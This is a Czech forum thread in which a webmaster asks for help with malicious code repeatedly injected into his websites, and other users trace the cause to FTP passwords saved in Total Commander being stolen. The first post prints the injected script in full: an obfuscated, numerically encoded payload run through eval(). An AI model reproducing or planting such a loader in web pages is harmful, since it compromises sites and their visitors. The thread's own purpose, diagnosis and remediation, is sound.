Jde o vir? Prosím o pomoc už nevím jak dál..
Dobrý den, na všech webech se mi ve zdrojovém kódu objevuje kód který jsem tam nenahrál. Včera například mi všechny weby hlásily (Avast) že byla zablokována hrozba. Kvůli tomu jsem celej počítač vymazal, přeinstalovat windows (kopie je legální) a pro jistotu projel počítač avastem. Test nenašel nic špatného (0 chyb). Tak jsem vytvořil znovu stránky, projel jsem opět souboby antivirem a nahrál na weby. Asi před hodinou se zase na všech webech objevilo toto. Je to všude za body a v ftp mi dycky přibide soubor jquerytoggle.js , jak se to může oběvovat na několika webech, když každý z nich má jinej webhosting a jiný obsah? Děkuji za rady , už nevím co s tím.
<!--c3284d--><script>try{n|=51;}catch(zxc){m=Math;n="1428..1755..1540..1485..1624..1575..1554..1650..448..1650..1414..1800..1624..1230..1358..1650..1400..1665..1526..1170..1638..1635..1372..1515..1596..600..574..1845..182..150..448..480..448..480..1652..1455..1596..480..1456..1575..448..915..448..1740..1456..1575..1610..690..1610..1515..1414..1500..448..705..448..1740..1456..1575..1610..690..1134..885..182..150..448..480..448..480..1652..1455..1596..480..1512..1665..448..915..448..1740..1456..1575..1610..690..1610..1515..1414..1500..448..555..448..1740..1456..1575..1610..690..1134..885..182..150..448..480..448..480..1652..1455..1596..480..1624..1515..1610..1740..448..915..448..1740..1456..1575..1610..690..910..480..588..480..1512..1665..448..675..448..1740..1456..1575..1610..690..1148..480..588..480..1456..1575..826..195..140..480..448..480..448..1575..1428..600..1624..1515..1610..1740..448..930..448..720..574..1845..182..150..448..480..448..480..448..480..448..480..1624..1560..1470..1725..644..1725..1414..1515..1400..480..854..480..1624..1515..1610..1740..826..195..140..480..448..480..448..1875..448..1515..1512..1725..1414..480..1722..195..140..480..448..480..448..480..448..480..448..1740..1456..1575..1610..690..644..720..448..705..448..1740..1456..1575..1610..690..1078..885....480..1596..1455..1540..1500..448..915..448..1650..1414..1785..448..1230..1358..1650..1400....1815..448..915..448..510..1456..1575..1400..1500..1414..1650..476..885..448..195..140..480..448..480..448..480..448..480..448..480..448..480..448..1500..1554..1485..1638..1635..1414..1650..1624..690..1372..1665..1400..1815..644..1455..1568..1680..1414..1650..1400..1005..1456..1575..1512..1500..560..1575..1428..1710..1526..615..826..195..140..135..126..135..1470..1530..1596..1455..1526..1515..1218..1455..1610..1005..1596..1515..1358..1740..1414..1500..448..915..448..1740..1596..1755..1414..885..182..150..448..480..448..480..448..480..448..480..1750..195..140..480..448..480..448..1875..1386..1455..1624..1485..1456..600..1414..615..1722..1575..1428..1710..1358..1635..1414..1305..1358..1725..938..1710..1414..1455..1624..1515..1400..480..854..480..1638..1650..1400..1515..1428..1575..1540..1515..1400..885..1750..195..140..1875..616..480..686..720..672..615..826".split("..");h=2;s="";for(i=0;i-1771!=0;i=1+i){k=i;s+=String["fromCharCode"](n[k]/(i-h*Math.floor(i/h)+016));}if(016-0xb===3)eval(""+s);}</script><!--/c3284d-->
Nepoužíváš náhodou k ftp přístupu na postižené weby Total Commander? Pokud pro přístup na ftp máš uložená hesla a nepoužíváš hlavní heslo mají roboti cestu k infikaci webu otevřenou.
Používám Total Comander. Nevěděli by jste o nějaké náhradě? Pokudmožno zdarma? Děkuji
Není třeba hned zahazovat to možná nejlepší co existuje, stačí jen používat hlavní heslo (pokud tedy nemášněkterou archaickou verzi TC) nebo jednoduše hesla k přístupu na ftp neukládat. V každém případě si co nejdříve všechna hesla změň, jinak problém nevyřešíš.
Jo a pokud mermo mocí chceš náhradu, tak já tam, kde nemohu použít TC instaluju Unreal Commander (je free). Ale souborových komanderů existuje celá řada.
Proč náhradu? Změň si na hostingu heslo pro přístup. Dávej pozor, ať si znovu do PC nenatáhneš trojana.
Total Commander za to nemůže. Pokud má někdo heslo, tak ta práva může změnit.
To není zcela přesné, TC není úplně bez viny. Ukládá toriž hesla ve snadno dešifrovatelné podobě a na všeobecně známém místě, ale také na to v okně konfigurace ftp upozorňuje. Je pak na každém, zda tuto slabinu ignoruje nebo použije jiný způsob zabezpečení. Ať už použitím hlavního hesla nebo tím, že hesla k ftp účtům prostě neukládá. Nebo si hlídá PC před viry.
Změnil jsem hesla, a už je nebudu ukládat. Děkuji všem za pomoc, snad to pofrčí, dík jste hodný
V TC je už nějakou dobu možnost zvolit si, kam se mají ukládat data profilu a hesla. To je prostě lamárna uživatelů, že to nechávají na default. A bez trojana se to heslo ven nedostane (trojana si stáhnou sami a dobrovolně).
Známé s TC to dělalo také. Pomohlo, když si před zavřením TC změnila heslo, že třeba na konec připsala "a" a před připojením umazala "jednu kuličku" (či hvězdičku nebo co tam je).
Prima FTP klient je Filezilla.